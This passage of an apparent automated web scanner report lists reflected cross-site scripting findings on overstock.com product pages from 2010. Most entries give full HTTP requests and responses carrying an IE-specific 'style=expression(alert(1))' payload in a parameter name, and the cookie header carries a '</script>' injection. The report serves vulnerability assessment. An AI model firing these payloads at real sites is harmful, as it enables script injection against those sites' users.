Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:18 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408178339:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:18 GMT; Path=/
Set-Cookie: mxcproclicks=5045672|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:18 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108568

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="18c8b"style="x:expression(alert(1))"366dab40ca2" value="1"/>
...[SNIP]...

2.14. http://www.overstock.com/Clothing-Shoes/Amerileather-Large-Universal-Shoulder-Bag/3011906/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Large-Universal-Shoulder-Bag/3011906/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 840a2"style%3d"x%3aexpression(alert(1))"5ec9222a23b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 840a2"style="x:expression(alert(1))"5ec9222a23b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Amerileather-Large-Universal-Shoulder-Bag/3011906/product.html?840a2"style%3d"x%3aexpression(alert(1))"5ec9222a23b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:29 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:29 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408189351:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:29 GMT; Path=/
Set-Cookie: mxcproclicks=3011906|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:29 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114165

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="840a2"style="x:expression(alert(1))"5ec9222a23b" value="1"/>
...[SNIP]...

2.15. http://www.overstock.com/Clothing-Shoes/Amerileather-Mens-Distressed-Brown-Leather-Bomber-Jacket/22704/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Mens-Distressed-Brown-Leather-Bomber-Jacket/22704/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77fe0"style%3d"x%3aexpression(alert(1))"15d03d4ed59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77fe0"style="x:expression(alert(1))"15d03d4ed59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Amerileather-Mens-Distressed-Brown-Leather-Bomber-Jacket/22704/product.html?77fe0"style%3d"x%3aexpression(alert(1))"15d03d4ed59=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:58:59 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:00 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=22704|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:00 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404739950:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:00 GMT; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 117683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="77fe0"style="x:expression(alert(1))"15d03d4ed59" value="1"/>
...[SNIP]...

2.16. http://www.overstock.com/Clothing-Shoes/Ann-Loren-Boutique-Girls-Jungle-Dress-and-Pant-Set/5093405/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Ann-Loren-Boutique-Girls-Jungle-Dress-and-Pant-Set/5093405/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3eb0"style%3d"x%3aexpression(alert(1))"cffb449a7f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3eb0"style="x:expression(alert(1))"cffb449a7f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Ann-Loren-Boutique-Girls-Jungle-Dress-and-Pant-Set/5093405/product.html?f3eb0"style%3d"x%3aexpression(alert(1))"cffb449a7f1=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:27 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:27 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5093405|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:27 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408127347:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:27 GMT; Path=/
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="f3eb0"style="x:expression(alert(1))"cffb449a7f1" value="1"/>
...[SNIP]...

2.17. http://www.overstock.com/Clothing-Shoes/Ann-Loren-Girls-2-piece-High-Fashion-Tutu-Outfit/5137568/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Ann-Loren-Girls-2-piece-High-Fashion-Tutu-Outfit/5137568/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9824"style%3d"x%3aexpression(alert(1))"c26b1ff405c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9824"style="x:expression(alert(1))"c26b1ff405c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Ann-Loren-Girls-2-piece-High-Fashion-Tutu-Outfit/5137568/product.html?c9824"style%3d"x%3aexpression(alert(1))"c26b1ff405c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:37 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:37 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408137050:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5137568|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:37 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:37 GMT; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 105755

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="c9824"style="x:expression(alert(1))"c26b1ff405c" value="1"/>
...[SNIP]...

2.18. http://www.overstock.com/Clothing-Shoes/AnnLoren-2-piece-Jungle-Rumba-Girls-Outfit/3416935/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/AnnLoren-2-piece-Jungle-Rumba-Girls-Outfit/3416935/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf911"style%3d"x%3aexpression(alert(1))"f07ee28680b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf911"style="x:expression(alert(1))"f07ee28680b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/AnnLoren-2-piece-Jungle-Rumba-Girls-Outfit/3416935/product.html?cf911"style%3d"x%3aexpression(alert(1))"f07ee28680b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:33 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:33 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:33 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3416935|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:33 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408133861:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="cf911"style="x:expression(alert(1))"f07ee28680b" value="1"/>
...[SNIP]...

2.19. http://www.overstock.com/Clothing-Shoes/AnnLoren-Boutique-Girls-Pink-Safari-Rumba-2-piece-Set/4084522/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/AnnLoren-Boutique-Girls-Pink-Safari-Rumba-2-piece-Set/4084522/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b826f"style%3d"x%3aexpression(alert(1))"c70ef4a1e21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b826f"style="x:expression(alert(1))"c70ef4a1e21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/AnnLoren-Boutique-Girls-Pink-Safari-Rumba-2-piece-Set/4084522/product.html?b826f"style%3d"x%3aexpression(alert(1))"c70ef4a1e21=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:32 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:32 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408132889:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4084522|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:32 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:32 GMT; Path=/
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110295

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="b826f"style="x:expression(alert(1))"c70ef4a1e21" value="1"/>
...[SNIP]...

2.20. http://www.overstock.com/Clothing-Shoes/Bamboo-by-Journee-Womens-Slouch-Boots-with-Buckle/3469442/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Bamboo-by-Journee-Womens-Slouch-Boots-with-Buckle/3469442/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8bff"style%3d"x%3aexpression(alert(1))"c97f61e0979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8bff"style="x:expression(alert(1))"c97f61e0979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Bamboo-by-Journee-Womens-Slouch-Boots-with-Buckle/3469442/product.html?f8bff"style%3d"x%3aexpression(alert(1))"c97f61e0979=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:50:06 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:50:06 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289404206782:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
